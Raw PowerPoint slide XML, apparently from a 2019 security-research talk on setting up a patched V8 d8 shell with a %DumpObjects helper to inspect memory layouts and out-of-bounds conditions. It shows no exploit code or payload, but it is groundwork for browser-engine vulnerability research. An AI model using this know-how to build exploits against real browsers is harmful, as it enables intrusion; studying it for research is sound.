          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>var b = [‘AAAA’, ‘BBBB’, ‘CCCC’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>var c = new Array(‘AAAA’, ‘BBBB’, ‘CCCC’);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC1143ED-2349-464A-8A13-E6FBAE852A31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659238" y="1525733"/>
            <a:ext cx="3750023" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var a = new Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a[0] = ‘AAAA’, a[1] = ‘BBBB’, a[2] = ‘CCCC’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var b = [‘AAAA’, ‘BBBB’, ‘CCCC’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var c = new Array(‘AAAA’, ‘BBBB’, ‘CCCC’);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDE8337-9C4C-44D4-8C01-EC5B010EBAA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150277" y="866181"/>
            <a:ext cx="6687075" cy="52322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a:t>I'm not talking about the theory of discovering vulnerabilities in v8 engines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>I ask you if you have a d8 combat sword ready for battle.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69FBAEA2-968A-45C3-B6B4-AC5CA24FA2F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3450572" y="1547103"/>
            <a:ext cx="5100406" cy="237819"/>
            <a:chOff x="3450572" y="1547103"/>
            <a:chExt cx="5100406" cy="237819"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="타원 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDEA6A58-3D99-4E95-99C4-43819911D814}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3450572" y="1547103"/>
              <a:ext cx="226122" cy="237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BFB17723-0F8A-41D7-B423-F086571001AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8324856" y="1547103"/>
              <a:ext cx="226122" cy="237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연결선: 구부러짐 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B442C251-BCD5-4A8A-BE15-ECC2DA0C0CF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10" idx="7"/>
              <a:endCxn id="22" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="6000775" y="-775265"/>
              <a:ext cx="12700" cy="4714392"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 155133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 name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016DEACD-5DD0-4D06-BB24-3CFCE43EEDB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1778261" y="2374852"/>
            <a:ext cx="8119149" cy="4077127"/>
            <a:chOff x="1778261" y="2374852"/>
            <a:chExt cx="8119149" cy="4077127"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="그룹 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EC18D0-845D-4BB4-BC2A-C415F471C4C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1778261" y="2374852"/>
              <a:ext cx="3223533" cy="4059006"/>
              <a:chOff x="1778261" y="2374852"/>
              <a:chExt cx="3223533" cy="4059006"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="그림 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C50D5BC2-BC3E-440A-89EE-D7B35685A589}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1850631" y="2374852"/>
                <a:ext cx="3151163" cy="4059006"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="88900" cap="sq" cmpd="thickThin">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="25400">
                  <a:schemeClr val="accent2">
                    <a:satMod val="175000"/>
                    <a:alpha val="28000"/>
                  </a:schemeClr>
                </a:glow>
                <a:innerShdw blurRad="76200">
                  <a:srgbClr val="000000"/>
                </a:innerShdw>
                <a:softEdge rad="38100"/>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="68" name="직사각형 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04DA929-3ADD-48E7-A968-D81DA776C222}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1789335" y="4634600"/>
                <a:ext cx="708664" cy="57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ADCDDAF2-52AE-492A-99C0-2D8BCA4E0E9E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1778261" y="3791333"/>
                <a:ext cx="708664" cy="57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1F7B99F8-8797-4231-80B6-9C8B2EB19FAA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1782985" y="2952708"/>
                <a:ext cx="708664" cy="57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 name="그룹 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2241F066-CA18-42F6-9A53-A93D6E5C41FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3012108" y="2374852"/>
              <a:ext cx="6885302" cy="4077127"/>
              <a:chOff x="3012108" y="2374852"/>
              <a:chExt cx="6885302" cy="4077127"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="그림 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063797F4-B26E-4086-8BCE-CCCC6FC994B8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6741150" y="2374852"/>
                <a:ext cx="3156260" cy="4077127"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="88900" cap="sq" cmpd="thickThin">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="25400">
                  <a:schemeClr val="accent2">
                    <a:satMod val="175000"/>
                    <a:alpha val="28000"/>
                  </a:schemeClr>
                </a:glow>
                <a:innerShdw blurRad="76200">
                  <a:srgbClr val="000000"/>
                </a:innerShdw>
                <a:softEdge rad="38100"/>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="직사각형 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42201113-3573-43DD-B72A-B6ED39A286B4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6701633" y="3343041"/>
                <a:ext cx="1120698" cy="57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연결선 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA5FA24B-726F-428B-BB57-583260FCD488}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="24" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3012108" y="3371841"/>
                <a:ext cx="3689525" cy="7442"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:headEnd type="triangle"/>
                <a:tailEnd w="lg" len="med"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:schemeClr val="accent1"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:schemeClr val="accent1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="tx1"/>
              </a:fontRef>
            </p:style>
          </p:cxnSp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF10251E-6B3A-4F19-BB55-A52E4B578A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3371531" y="3375409"/>
            <a:ext cx="3287707" cy="1061829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The better the debugging function, the more complex and difficult to use. Rather a simple dump function is best. DebugView is the most commonly used debugging tool on Windows. However, the role of DebugView is to simply print the OutputDebugString message. It is a simple message dump function. Similarly, the role of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DumpObjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is necessary to dump OOB like memory.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="TextBox 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F73E57-07E8-485E-9CE9-79BB13370D4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1465207" y="6435268"/>
            <a:ext cx="8708504" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The developer recognizes all the code without much difference, but the hacker(or security researcher) should be able to see the details of the memory layout directly without guessing.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="슬라이드 번호 개체 틀 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E3559BC-6830-4F72-9736-C952BFB11409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="날짜 개체 틀 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06FA7032-BD17-4E5B-8402-3AC3694C19D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B8DAE0B6-F03A-4B97-9298-5881F3917801}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3739848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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6687075"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How to enchant a d8 Lightsaber?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDE8337-9C4C-44D4-8C01-EC5B010EBAA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150277" y="866181"/>
            <a:ext cx="6281173"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sz="1200"/>
              <a:t>It's time to enchant your d8 debugging tool with a lightsaber.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>You should get the source code from the following github and patch the v8 source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>You can use the %DumpObjects function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Then you will see something very interesting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 5" descr="사람, 남자, 서있는, 전면이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B9C3FD6-1383-43D2-B625-4BF9FEBC7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110" y="1697178"/>
            <a:ext cx="6281173" cy="4710880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53020C6E-2733-44B1-99D8-8F75974F5460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9266498" y="6356523"/>
            <a:ext cx="2469898" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/AmesianX/v8_doare-helpers</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FEB4D06-E7B6-4C1E-BBF3-48C1E12AED27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6662283" y="2212288"/>
            <a:ext cx="3544564" cy="2081176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85445378-F00F-41AE-B12A-905C04731CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6665737" y="1697178"/>
            <a:ext cx="2569515" cy="24622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400">
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to Build Windows d8.exe?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="직사각형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BFAEF6B-D32A-43EC-A1D3-C016A15D2F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590574" y="1978816"/>
            <a:ext cx="5208196" cy="200055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
